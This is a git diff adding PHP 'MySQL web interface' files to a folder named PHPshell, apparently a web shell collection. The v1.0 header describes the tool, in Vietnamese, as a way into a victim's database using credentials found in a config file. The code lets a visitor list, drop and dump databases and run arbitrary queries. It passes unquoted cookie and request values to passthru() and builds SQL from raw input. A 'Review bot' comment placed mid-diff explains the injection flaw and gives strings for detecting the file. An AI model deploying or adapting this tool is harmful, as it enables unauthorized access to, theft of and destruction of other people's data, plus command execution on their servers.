if( $type == +"timestamp" ) echo "checked";?>>TIMESTAMP (1970-01-01 00:00:00 ~ +2106..., +YYYYMMDD[HH[MM[SS]]])</td> +<td align=center>O</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="TIME" <? if( $type == "time" ) +echo +"checked";?>>TIME (-838:59:59 ~ 838:59:59, HH:MM:SS)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="YEAR" <? if( $type == "year" ) +echo +"checked";?>>YEAR (1901 ~ 2155, 0000, YYYY)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="CHAR" <? if( $type == "char" ) +echo +"checked";?>>CHAR</td> +<td align=center>O</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td align=center>O</td> +</tr> +<tr> +<td><input type=radio name=type value="VARCHAR" <? if( $type == +"varchar" ) +echo "checked";?>>VARCHAR</td> +<td align=center>O</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td align=center>O</td> +</tr> +<tr> +<td><input type=radio name=type value="TINYTEXT" <? if( $type == +"tinytext" +) echo "checked";?>>TINYTEXT (0 ~ 255)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="TEXT" <? if( $type == "text" ) +echo +"checked";?>>TEXT (0 ~ 65535)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="MEDIUMTEXT" <? if( $type == +"mediumtext" ) echo "checked";?>>MEDIUMTEXT (0 ~ 16777215)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="LONGTEXT" <? 
if( $type == +"longtext" +) echo "checked";?>>LONGTEXT (0 ~ 4294967295)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="TINYBLOB" <? if( $type == +"tinyblob" +) echo "checked";?>>TINYBLOB (0 ~ 255)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="BLOB" <? if( $type == "blob" ) +echo +"checked";?>>BLOB (0 ~ 65535)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="MEDIUMBLOB" <? if( $type == +"mediumblob" ) echo "checked";?>>MEDIUMBLOB (0 ~ 16777215)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="LONGBLOB" <? if( $type == +"longblob" +) echo "checked";?>>LONGBLOB (0 ~ 4294967295)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="ENUM" <? if( $type == "enum" ) +echo +"checked";?>>ENUM</td> +<td colspan=5><center>value list</center></td> +</tr> +<tr> +<td><input type=radio name=type value="SET" <? if( $type == "set" ) +echo +"checked";?>>SET</td> +<td colspan=5><center>value list</center></td> +</tr> + +</table> +<table> +<tr><th>M</th><th>D</th><th>unsigned</th><th>zerofill</th><th>binary</th><th>value +list (ex: 'apple', 'orange', 'banana') </th></tr> +<tr> +<td align=center><input type=text size=4 name=M <? if( $M != "" ) echo +"value=$M";?>></td> +<td align=center><input type=text size=4 name=D <? if( $D != "" ) echo +"value=$D";?>></td> +<td align=center><input type=checkbox name=unsigned value="UNSIGNED" <? +if( +strpos( $fieldtype, "unsigned" ) ) echo "checked";?>></td> +<td align=center><input type=checkbox name=zerofill value="ZEROFILL" <? 
+if( +strpos( $fieldtype, "zerofill" ) ) echo "checked";?>></td> +<td align=center><input type=checkbox name=binary value="BINARY" <? if( +strpos( $fieldtype, "binary" ) ) echo "checked";?>></td> +<td align=center><input type=text size=60 name=valuelist <? if( +$valuelist +!= "" ) echo "value=\"$valuelist\"";?>></td> +</tr> +</table> + + +<h3>Flags</h3> +<table> +<tr><th>not null</th><th>default value</th><th>auto +increment</th><th>primary key</th></tr> +<tr> +<td align=center><input type=checkbox name=not_null value="NOT NULL" <? +if( +$fieldnull != "YES" ) echo "checked";?>></td> +<td align=center><input type=text name=default_value <? if( +$fielddefault != +"" ) echo "value=$fielddefault";?>></td> +<td align=center><input type=checkbox name=auto_increment +value="AUTO_INCREMENT" <? if( $fieldextra == "auto_increment" ) echo +"checked";?>></td> +<td align=center><input type=checkbox name=primary_key value="PRIMARY +KEY" +<? if( $fieldkey == "PRI" ) echo "checked";?>></td> +</tr> +</table> + +<p> + +<? 
+ if( $cmd == "add" ) + echo "<input type=submit value='Add Field'>\n"; + else if( $cmd == "edit" ) + echo "<input type=submit value='Edit Field'>\n"; + echo "<input type=button value=Cancel onClick='history.back()'>\n"; + echo "</form>\n"; +} + +function manageField_submit( $cmd ) { + global $mysqlHandle, $dbname, $tablename, $old_name, $name, $type, +$PHP_SELF, $queryStr, $errMsg, + $M, $D, $unsigned, $zerofill, $binary, $not_null, $default_value, +$auto_increment, $primary_key, $valuelist; + + if( $cmd == "add" ) + $queryStr = "ALTER TABLE $tablename ADD $name "; + else if( $cmd == "edit" ) + $queryStr = "ALTER TABLE $tablename CHANGE $old_name $name "; + + if( $M != "" ) + if( $D != "" ) + $queryStr .= "$type($M,$D) "; + else + $queryStr .= "$type($M) "; + else if( $valuelist != "" ) { + $valuelist = stripslashes( $valuelist ); + $queryStr .= "$type($valuelist) "; + } else + $queryStr .= "$type "; + + $queryStr .= "$unsigned $zerofill $binary "; + + if( $default_value != "" ) + $queryStr .= "DEFAULT '$default_value' "; + + $queryStr .= "$not_null $auto_increment"; + + mysql_select_db( $dbname, $mysqlHandle ); + mysql_query( $queryStr, $mysqlHandle ); + $errMsg = mysql_error(); + + // key change + $keyChange = false; + $result = mysql_query( "SHOW KEYS FROM $tablename" ); + $primary = ""; + while( $row = mysql_fetch_array($result) ) + if( $row["Key_name"] == "PRIMARY" ) { + if( $row[Column_name] == $name ) + $keyChange = true; + else + $primary .= ", $row[Column_name]"; + } + if( $primary_key == "PRIMARY KEY" ) { + $primary .= ", $name"; + $keyChange = !$keyChange; + } + $primary = substr( $primary, 2 ); + if( $keyChange == true ) { + $q = "ALTER TABLE $tablename DROP PRIMARY KEY"; + mysql_query( $q ); + $queryStr .= "<br>\n" . $q; + $errMsg .= "<br>\n" . mysql_error(); + $q = "ALTER TABLE $tablename ADD PRIMARY KEY( $primary )"; + mysql_query( $q ); + $queryStr .= "<br>\n" . $q; + $errMsg .= "<br>\n" . 
mysql_error(); + } + + viewSchema(); +} + +function dropField() { + global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, +$queryStr, +$errMsg; + + $queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname"; + mysql_select_db( $dbname, $mysqlHandle ); + mysql_query( $queryStr , $mysqlHandle ); + $errMsg = mysql_error(); + + viewSchema(); +} + +function viewData( $queryStr ) { + global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, +$rowperpage, $orderby; + + echo "<h1>Data in Table</h1>\n"; + if( $tablename != "" ) + echo "<p class=location>$dbname &gt; $tablename</p>\n"; + else + echo "<p class=location>$dbname</p>\n"; + + $queryStr = stripslashes( $queryStr ); + if( $queryStr == "" ) { + $queryStr = "SELECT * FROM $tablename"; + if( $orderby != "" ) + $queryStr .= " ORDER BY $orderby"; + echo "<a +href='$PHP_SELF?action=addData&dbname=$dbname&tablename=$tablename'>Add +Data</a> | \n"; + echo "<a +href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n"; + } + + $pResult = mysql_db_query( $dbname, $queryStr ); + $errMsg = mysql_error(); + + $GLOBALS[queryStr] = $queryStr; + + if( $pResult == false ) { + echoQueryResult(); + return; + } + if( $pResult == 1 ) { + $errMsg = "Success"; + echoQueryResult(); + return; + } + + echo "<hr>\n"; + + $row = mysql_num_rows( $pResult ); + $col = mysql_num_fields( $pResult ); + + if( $row == 0 ) { + echo "No Data Exist!"; + return; + } + + if( $rowperpage == "" ) $rowperpage = 20; + if( $page == "" ) $page = 0; + else $page--; + mysql_data_seek( $pResult, $page * $rowperpage ); + + echo "<table cellspacing=1 cellpadding=2>\n"; + echo "<tr>\n"; + for( $i = 0; $i < $col; $i++ ) { + $field = mysql_fetch_field( $pResult, $i ); + echo "<th>"; + echo "<a +href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n"; + echo "</th>\n"; + } + echo "<th colspan=2>Action</th>\n"; + echo "</tr>\n"; + + for( $i = 0; $i < 
$rowperpage; $i++ ) { + $rowArray = mysql_fetch_row( $pResult ); + if( $rowArray == false ) break; + echo "<tr>\n"; + $key = ""; + for( $j = 0; $j < $col; $j++ ) { + $data = $rowArray[$j]; + + $field = mysql_fetch_field( $pResult, $j ); + if( $field->primary_key == 1 ) + $key .= "&" . $field->name . "=" . $data; + + if( strlen( $data ) > 20 ) + $data = substr( $data, 0, 20 ) . "..."; + $data = htmlspecialchars( $data ); + echo "<td>\n"; + echo "$data\n"; + echo "</td>\n"; + } + + if( $key == "" ) + echo "<td colspan=2>no Key</td>\n"; + else { + echo "<td><a +href='$PHP_SELF?action=editData&dbname=$dbname&tablename=$tablename$key'>Edit</a></td>\n"; + echo "<td><a +href='$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablename$key' +onClick=\"return confirm('Delete Row?')\">Delete</a></td>\n"; + } + echo "</tr>\n"; + } + echo "</table>\n"; + + echo "<font size=2>\n"; + echo "<form +action='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename' +method=post>\n"; + echo "<font color=green>\n"; + echo ($page+1)."/".(int)($row/$rowperpage+1)." 
page"; + echo "</font>\n"; + echo " | "; + if( $page > 0 ) { + echo "<a +href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page); + if( $orderby != "" ) + echo "&orderby=$orderby"; + echo "'>Prev</a>\n"; + } else + echo "Prev"; + echo " | "; + if( $page < ($row/$rowperpage)-1 ) { + echo "<a +href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page+2); + if( $orderby != "" ) + echo "&orderby=$orderby"; + echo "'>Next</a>\n"; + } else + echo "Next"; + echo " | "; + if( $row > $rowperpage ) { + echo "<input type=text size=4 name=page>\n"; + echo "<input type=submit value='Go'>\n"; + } + echo "</form>\n"; + echo "</font>\n"; +} + +function manageData( $cmd ) { + global $mysqlHandle, $dbname, $tablename, $PHP_SELF; + + if( $cmd == "add" ) + echo "<h1>Add Data</h1>\n"; + else if( $cmd == "edit" ) { + echo "<h1>Edit Data</h1>\n"; + $pResult = mysql_list_fields( $dbname, $tablename ); + $num = mysql_num_fields( $pResult ); + + $key = ""; + for( $i = 0; $i < $num; $i++ ) { + $field = mysql_fetch_field( $pResult, $i ); + if( $field->primary_key == 1 ) + if( $field->numeric == 1 ) + $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND "; + else + $key .= $field->name . "='" . $GLOBALS[$field->name] . 
"' AND "; + } + $key = substr( $key, 0, strlen($key)-4 ); + + mysql_select_db( $dbname, $mysqlHandle ); + $pResult = mysql_query( $queryStr = "SELECT * FROM $tablename WHERE +$key", $mysqlHandle ); + $data = mysql_fetch_array( $pResult ); + } + + echo "<p class=location>$dbname &gt; $tablename</p>\n"; + + echo "<form action='$PHP_SELF' method=post>\n"; + if( $cmd == "add" ) + echo "<input type=hidden name=action value=addData_submit>\n"; + else if( $cmd == "edit" ) + echo "<input type=hidden name=action value=editData_submit>\n"; + echo "<input type=hidden name=dbname value=$dbname>\n"; + echo "<input type=hidden name=tablename value=$tablename>\n"; + echo "<table cellspacing=1 cellpadding=2>\n"; + echo "<tr>\n"; + echo "<th>Name</th>\n"; + echo "<th>Type</th>\n"; + echo "<th>Function</th>\n"; + echo "<th>Data</th>\n"; + echo "</tr>\n"; + + $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" ); + $num = mysql_num_rows( $pResult ); + + $pResultLen = mysql_list_fields( $dbname, $tablename ); + + for( $i = 0; $i < $num; $i++ ) { + $field = mysql_fetch_array( $pResult ); + $fieldname = $field["Field"]; + $fieldtype = $field["Type"]; + $len = mysql_field_len( $pResultLen, $i ); + + echo "<tr>"; + echo "<td>$fieldname</td>"; + echo "<td>".$field["Type"]."</td>"; + echo "<td>\n"; + echo "<select name=${fieldname}_function>\n"; + echo "<option>\n"; + echo "<option>ASCII\n"; + echo "<option>CHAR\n"; + echo "<option>SOUNDEX\n"; + echo "<option>CURDATE\n"; + echo "<option>CURTIME\n"; + echo "<option>FROM_DAYS\n"; + echo "<option>FROM_UNIXTIME\n"; + echo "<option>NOW\n"; + echo "<option>PASSWORD\n"; + echo "<option>PERIOD_ADD\n"; + echo "<option>PERIOD_DIFF\n"; + echo "<option>TO_DAYS\n"; + echo "<option>USER\n"; + echo "<option>WEEKDAY\n"; + echo "<option>RAND\n"; + echo "</select>\n"; + echo "</td>\n"; + $value = htmlspecialchars($data[$i]); + if( $cmd == "add" ) { + $type = strtok( $fieldtype, " (,)\n" ); + if( $type == "enum" || $type == "set" ) { + echo 
"<td>\n"; + if( $type == "enum" ) + echo "<select name=$fieldname>\n"; + else if( $type == "set" ) + echo "<select name=$fieldname size=4 multiple>\n"; + echo strtok( "'" ); + while( $str = strtok( "'" ) ) { + echo "<option>$str\n"; + strtok( "'" ); + } + echo "</select>\n"; + echo "</td>\n"; + } else { + if( $len < 40 ) + echo "<td><input type=text size=40 maxlength=$len +name=$fieldname></td>\n"; + else + echo "<td><textarea cols=40 rows=3 maxlength=$len +name=$fieldname></textarea>\n"; + } + } else if( $cmd == "edit" ) { + $type = strtok( $fieldtype, " (,)\n" ); + if( $type == "enum" || $type == "set" ) { + echo "<td>\n"; + if( $type == "enum" ) + echo "<select name=$fieldname>\n"; + else if( $type == "set" ) + echo "<select name=$fieldname size=4 multiple>\n"; + echo strtok( "'" ); + while( $str = strtok( "'" ) ) { + if( $value == $str ) + echo "<option selected>$str\n"; + else + echo "<option>$str\n"; + strtok( "'" ); + } + echo "</select>\n"; + echo "</td>\n"; + } else { + if( $len < 40 ) + echo "<td><input type=text size=40 maxlength=$len name=$fieldname +value=\"$value\"></td>\n"; + else + echo "<td><textarea cols=40 rows=3 maxlength=$len +name=$fieldname>$value</textarea>\n"; + } + } + echo "</tr>"; + } + echo "</table><p>\n"; + if( $cmd == "add" ) + echo "<input type=submit value='Add Data'>\n"; + else if( $cmd == "edit" ) + echo "<input type=submit value='Edit Data'>\n"; + echo "<input type=button value='Cancel' onClick='history.back()'>\n"; + echo "</form>\n"; +} + +function manageData_submit( $cmd ) { + global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, +$queryStr, +$errMsg; + + $pResult = mysql_list_fields( $dbname, $tablename ); + $num = mysql_num_fields( $pResult ); + + mysql_select_db( $dbname, $mysqlHandle ); + if( $cmd == "add" ) + $queryStr = "INSERT INTO $tablename VALUES ("; + else if( $cmd == "edit" ) + $queryStr = "REPLACE INTO $tablename VALUES ("; + for( $i = 0; $i < $num-1; $i++ ) { + $field = mysql_fetch_field( $pResult ); 
+ $func = $GLOBALS[$field->name."_function"]; + if( $func != "" ) + $queryStr .= " $func("; + if( $field->numeric == 1 ) { + $queryStr .= $GLOBALS[$field->name]; + if( $func != "" ) + $queryStr .= "),"; + else + $queryStr .= ","; + } else { + $queryStr .= "'" . $GLOBALS[$field->name]; + if( $func != "" ) + $queryStr .= "'),"; + else + $queryStr .= "',"; + } + } + $field = mysql_fetch_field( $pResult ); + if( $field->numeric == 1 ) + $queryStr .= $GLOBALS[$field->name] . ")"; + else + $queryStr .= "'" . $GLOBALS[$field->name] . "')"; + + mysql_query( $queryStr , $mysqlHandle ); + $errMsg = mysql_error(); + + viewData( "" ); +} + +function deleteData() { + global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, +$queryStr, +$errMsg; + + $pResult = mysql_list_fields( $dbname, $tablename ); + $num = mysql_num_fields( $pResult ); + + $key = ""; + for( $i = 0; $i < $num; $i++ ) { + $field = mysql_fetch_field( $pResult, $i ); + if( $field->primary_key == 1 ) + if( $field->numeric == 1 ) + $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND "; + else + $key .= $field->name . "='" . $GLOBALS[$field->name] . 
"' AND "; + } + $key = substr( $key, 0, strlen($key)-4 ); + + mysql_select_db( $dbname, $mysqlHandle ); + $queryStr = "DELETE FROM $tablename WHERE $key"; + mysql_query( $queryStr, $mysqlHandle ); + $errMsg = mysql_error(); + + viewData( "" ); +} + +function dump() { + global $PHP_SELF, $USERNAME, $PASSWORD, $action, $dbname, $tablename; + + if( $action == "dumpTable" ) + $filename = $tablename; + else + $filename = $dbname; + + header("Content-disposition: filename=$filename.sql"); + header("Content-type: application/octetstream"); + header("Pragma: no-cache"); + header("Expires: 0"); + + $pResult = mysql_query( "show variables" ); + while( 1 ) { + $rowArray = mysql_fetch_row( $pResult ); + if( $rowArray == false ) break; + if( $rowArray[0] == "basedir" ) + $bindir = $rowArray[1]."bin/"; + } + + passthru( $bindir."mysqldump --user=$USERNAME --password=$PASSWORD +$dbname +$tablename" ); +} + +function utils() { + global $PHP_SELF, $command; + echo "<h1>Utilities</h1>\n"; + if( $command == "" || substr( $command, 0, 5 ) == "flush" ) { + echo "<hr>\n"; + echo "Show\n"; + echo "<ul>\n"; + echo "<li><a +href='$PHP_SELF?action=utils&command=show_status'>Status</a>\n"; + echo "<li><a +href='$PHP_SELF?action=utils&command=show_variables'>Variables</a>\n"; + echo "<li><a +href='$PHP_SELF?action=utils&command=show_processlist'>Processlist</a>\n"; + echo "</ul>\n"; + echo "Flush\n"; + echo "<ul>\n"; + echo "<li><a +href='$PHP_SELF?action=utils&command=flush_hosts'>Hosts</a>\n"; + if( $command == "flush_hosts" ) { + if( mysql_query( "Flush hosts" ) != false ) + echo "<font size=2 color=red>- Success</font>"; + else + echo "<font size=2 color=red>- Fail</font>"; + } + echo "<li><a +href='$PHP_SELF?action=utils&command=flush_logs'>Logs</a>\n"; + if( $command == "flush_logs" ) { + if( mysql_query( "Flush logs" ) != false ) + echo "<font size=2 color=red>- Success</font>"; + else + echo "<font size=2 color=red>- Fail</font>"; + } + echo "<li><a 
+href='$PHP_SELF?action=utils&command=flush_privileges'>Privileges</a>\n"; + if( $command == "flush_privileges" ) { + if( mysql_query( "Flush privileges" ) != false ) + echo "<font size=2 color=red>- Success</font>"; + else + echo "<font size=2 color=red>- Fail</font>"; + } + echo "<li><a +href='$PHP_SELF?action=utils&command=flush_tables'>Tables</a>\n"; + if( $command == "flush_tables" ) { + if( mysql_query( "Flush tables" ) != false ) + echo "<font size=2 color=red>- Success</font>"; + else + echo "<font size=2 color=red>- Fail</font>"; + } + echo "<li><a +href='$PHP_SELF?action=utils&command=flush_status'>Status</a>\n"; + if( $command == "flush_status" ) { + if( mysql_query( "Flush status" ) != false ) + echo "<font size=2 color=red>- Success</font>"; + else + echo "<font size=2 color=red>- Fail</font>"; + } + echo "</ul>\n"; + } else { + $queryStr = ereg_replace( "_", " ", $command ); + $pResult = mysql_query( $queryStr ); + if( $pResult == false ) { + echo "Fail"; + return; + } + $col = mysql_num_fields( $pResult ); + + echo "<p class=location>$queryStr</p>\n"; + echo "<hr>\n"; + + echo "<table cellspacing=1 cellpadding=2 border=0>\n"; + echo "<tr>\n"; + for( $i = 0; $i < $col; $i++ ) { + $field = mysql_fetch_field( $pResult, $i ); + echo "<th>".$field->name."</th>\n"; + } + echo "</tr>\n"; + + while( 1 ) { + $rowArray = mysql_fetch_row( $pResult ); + if( $rowArray == false ) break; + echo "<tr>\n"; + for( $j = 0; $j < $col; $j++ ) + echo "<td>".htmlspecialchars( $rowArray[$j] )."</td>\n"; + echo "</tr>\n"; + } + echo "</table>\n"; + } +} + +function header_html() { + global $PHP_SELF; + +?> +<html> +<head> +<title>MySQL Web Interface</title> +<style type="text/css"> +<!-- +p.location { + color: #11bb33; + font-size: small; +} +h1 { + color: #A4A260; +} +th { + background-color: #BDBE42; + color: #FFFFFF; + font-size: x-small; +} +td { + background-color: #DEDFA5; + font-size: x-small; +} +form { + margin-top: 0; + margin-bottom: 0; +} +a { + 
text-decoration:none; + color: #848200; + font-size:x-small; +} +a:link { +} +a:hover { + background-color:#EEEFD5; + color:#646200; + text-decoration:none +} +//--> +</style> +</head> +<body> +<? +} + +function footer_html() { + global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $USERNAME; + + echo "<hr>\n"; + echo "<font size=2>\n"; + echo "<font color=blue>[$USERNAME]</font> - \n"; + + echo "<a href='$PHP_SELF?action=listDBs'>Database List</a> | \n"; + if( $tablename != "" ) + echo "<a +href='$PHP_SELF?action=listTables&dbname=$dbname&tablename=$tablename'>Table +List</a> | "; + echo "<a href='$PHP_SELF?action=utils'>Utils</a> |\n"; + echo "<a href='$PHP_SELF?action=logout'>Logout</a>\n"; + echo "</font>\n"; + echo "</body>\n"; + echo "</html>\n"; +} + +//------------------------------------------------------ MAIN + +if( $action == "logon" || $action == "" || $action == "logout" ) + logon(); +else if( $action == "logon_submit" ) + logon_submit(); +else if( $action == "dumpTable" || $action == "dumpDB" ) { + while( list($var, $value) = each($HTTP_COOKIE_VARS) ) { + if( $var == "mysql_web_admin_username" ) $USERNAME = $value; + if( $var == "mysql_web_admin_password" ) $PASSWORD = $value; + } + $mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD ); + dump(); +} else { + while( list($var, $value) = each($HTTP_COOKIE_VARS) ) { + if( $var == "mysql_web_admin_username" ) $USERNAME = $value; + if( $var == "mysql_web_admin_password" ) $PASSWORD = $value; + } + echo "<!--"; + $mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD ); + echo "-->"; + + if( $mysqlHandle == false ) { + echo "<html>\n"; + echo "<head>\n"; + echo "<title>MySQL Web Interface</title>\n"; + echo "</head>\n"; + echo "<body>\n"; + echo "<table width=100% height=100%><tr><td><center>\n"; + echo "<h1>Wrong Password!</h1>\n"; + echo "<a href='$PHP_SELF?action=logon'>Logon</a>\n"; + echo "</center></td></tr></table>\n"; + echo "</body>\n"; + echo "</html>\n"; + } else { + 
header_html();
+ if( $action == "listDBs" )
+ listDatabases();
+ else if( $action == "createDB" )
+ createDatabase();
+ else if( $action == "dropDB" )
+ dropDatabase();
+ else if( $action == "listTables" )
+ listTables();
+ else if( $action == "createTable" )
+ createTable();
+ else if( $action == "dropTable" )
+ dropTable();
+ else if( $action == "viewSchema" )
+ viewSchema();
+ else if( $action == "query" )
+ viewData( $queryStr );
+ else if( $action == "addField" )
+ manageField( "add" );
+ else if( $action == "addField_submit" )
+ manageField_submit( "add" );
+ else if( $action == "editField" )
+ manageField( "edit" );
+ else if( $action == "editField_submit" )
+ manageField_submit( "edit" );
+ else if( $action == "dropField" )
+ dropField();
+ else if( $action == "viewData" )
+ viewData( "" );
+ else if( $action == "addData" )
+ manageData( "add" );
+ else if( $action == "addData_submit" )
+ manageData_submit( "add" );
+ else if( $action == "editData" )
+ manageData( "edit" );
+ else if( $action == "editData_submit" )
+ manageData_submit( "edit" );
+ else if( $action == "deleteData" )
+ deleteData();
+ else if( $action == "utils" )
+ utils();
+
+ mysql_close( $mysqlHandle);
+ footer_html();
+ }
+}
+
+?>
diff --git a/php/PHPshell/Mysql interface v1.0/Mysql interface v1.0.jpg b/php/PHPshell/Mysql interface v1.0/Mysql interface v1.0.jpg
new file mode 100644
index 0000000..c4d51e7
Binary files /dev/null and b/php/PHPshell/Mysql interface v1.0/Mysql interface v1.0.jpg differ
diff --git a/php/PHPshell/Mysql interface v1.0/Mysql interface v1.0.php b/php/PHPshell/Mysql interface v1.0/Mysql interface v1.0.php
new file mode 100644
index 0000000..28a5e14
--- /dev/null
+++ b/php/PHPshell/Mysql interface v1.0/Mysql interface v1.0.php
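Review bot: In `dump()` of `MySQL Web Interface Version 0.8.php`, the `passthru()` call builds the `mysqldump` command line from `$USERNAME`, `$PASSWORD`, `$dbname` and `$tablename` with no shell quoting, and the main block fills the first two from the `mysql_web_admin_*` cookies while the other two are request-supplied globals, so any shell metacharacter in them is interpreted by the shell. Each value should go through `escapeshellarg()`, with the table argument appended only for `dumpTable`, e.g. `$cmd = $bindir."mysqldump --user=".escapeshellarg($USERNAME)." --password=".escapeshellarg($PASSWORD)." ".escapeshellarg($dbname);` followed by `if( $action == "dumpTable" ) $cmd .= " ".escapeshellarg($tablename);`. The string literal as added also appears wrapped across three lines, which would carry newlines into the command, so it should sit on one line. Separately, `logon_submit()` stores the database password in a plain cookie and the logon form has no `method=post`, so the credentials also travel in the query string and end up in access logs; a server-side session would avoid both. For triage of a web root, the cookie names `mysql_web_admin_username` / `mysql_web_admin_password` together with a `passthru` of `mysqldump` are stable strings to match this file on.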
@@ -0,0 +1,1166 @@
+<?
+/*
+* Mysql interface v1.0
+* -------------------------------
+* Description :
+* Dung` de login vao` CSDL cua victim khi da biet user va` pass cua mysql thong qua file config
+*/
+
+$HOSTNAME = "localhost";
+
+function logon() {
+global $PHP_SELF;
+
+setcookie( "mysql_web_admin_username" );
+setcookie( "mysql_web_admin_password" );
+echo "<html>\n";
+echo "<head>\n";
+echo "<title>Mysql interface</title>\n";
+echo "</head>\n";
+echo "<body>\n";
+echo "<table width=100% height=100%><tr><td><center>\n";
+echo "<table cellpadding=2><tr><td bgcolor=#0090FF><center>\n";
+echo "<table cellpadding=20><tr><td bgcolor=#ffffff><center>\n";
+echo "<h1><b><font color=#FF0000>Mysql Interface v1.0</font></b></h1>\n";
+echo "<form action='$PHP_SELF'>\n";
+echo "<input type=hidden name=action value=logon_submit>\n";
+echo "<table cellpadding=5 cellspacing=1>\n";
+echo "<tr><td>Username </td><td> <input type=text name=username></td></tr>\n";
+echo "<tr><td>Password </td><td> <input type=password name=password></td></tr>\n";
+echo "</table><p>\n";
+echo "<input type=submit value='Enter'>\n";
+echo "<input type=reset value='Clear'><br>\n";
+echo "</form>\n";
+echo "</center></td></tr></table>\n";
+echo "</center></td></tr></table>\n";
+echo "<p><hr width=300>\n";
+echo "<font size=2>\n";
+echo "Copyright &copy; 2005\n <br>";
+echo "</font>\n";
+echo "</center></td></tr></table>\n";
+echo "</body>\n";
+echo "</html>\n";
+}
+
+function logon_submit() {
+global $username, $password, $PHP_SELF;
+
+setcookie( "mysql_web_admin_username", $username );
+setcookie( "mysql_web_admin_password", $password );
+echo "<html>";
+echo "<head>";
+echo "<META HTTP-EQUIV=Refresh CONTENT='0; URL=$PHP_SELF?action=listDBs'>";
+echo "</head>";
+echo "</html>";
+}
+
+function echoQueryResult() {
+global $queryStr, $errMsg;
+
+if( $errMsg == "" ) $errMsg = "Success";
+if( $queryStr != "" ) {
+ echo "<table cellpadding=5>\n";
+ echo "<tr><td>Query</td><td>$queryStr</td></tr>\n";
+ echo
"<tr><td>Result</td><td>$errMsg</td></tr>\n"; + echo "</table><p>\n"; +} +} + +function listDatabases() { +global $mysqlHandle, $PHP_SELF; + +echo "<h1>Database List</h1>\n"; + +echo "<form action='$PHP_SELF'>\n"; +echo "<input type=hidden name=action value=createDB>\n"; +echo "<input type=text name=dbname>\n"; +echo "<input type=submit value='Create Database'>\n"; +echo "</form>\n"; +echo "<hr>\n"; + +echo "<table cellspacing=1 cellpadding=5>\n"; + +$pDB = mysql_list_dbs( $mysqlHandle ); +$num = mysql_num_rows( $pDB ); +for( $i = 0; $i < $num; $i++ ) { + $dbname = mysql_dbname( $pDB, $i ); + echo "<tr>\n"; + echo "<td>$dbname</td>\n"; + echo "<td><a href='$PHP_SELF?action=listTables&dbname=$dbname'>Table</a></td>\n"; + echo "<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a></td>\n"; + echo "<td><a href='$PHP_SELF?action=dumpDB&dbname=$dbname'>Dump</a></td>\n"; + echo "</tr>\n"; +} +echo "</table>\n"; +} + +function createDatabase() { +global $mysqlHandle, $dbname, $PHP_SELF; + +mysql_create_db( $dbname, $mysqlHandle ); +listDatabases(); +} + +function dropDatabase() { +global $mysqlHandle, $dbname, $PHP_SELF; + +mysql_drop_db( $dbname, $mysqlHandle ); +listDatabases(); +} + +function listTables() { +global $mysqlHandle, $dbname, $PHP_SELF; + +echo "<h1>Table List</h1>\n"; +echo "<p class=location>$dbname</p>\n"; +echoQueryResult(); +echo "<form action='$PHP_SELF'>\n"; +echo "<input type=hidden name=action value=createTable>\n"; +echo "<input type=hidden name=dbname value=$dbname>\n"; +echo "<input type=text name=tablename>\n"; +echo "<input type=submit value='Create Table'>\n"; +echo "</form>\n"; +echo "<form action='$PHP_SELF'>\n"; +echo "<input type=hidden name=action value=query>\n"; +echo "<input type=hidden name=dbname value=$dbname>\n"; +echo "<input type=text size=40 name=queryStr>\n"; +//echo "<textarea cols=30 rows=3 name=queryStr></textarea><br>"; +echo "<input type=submit 
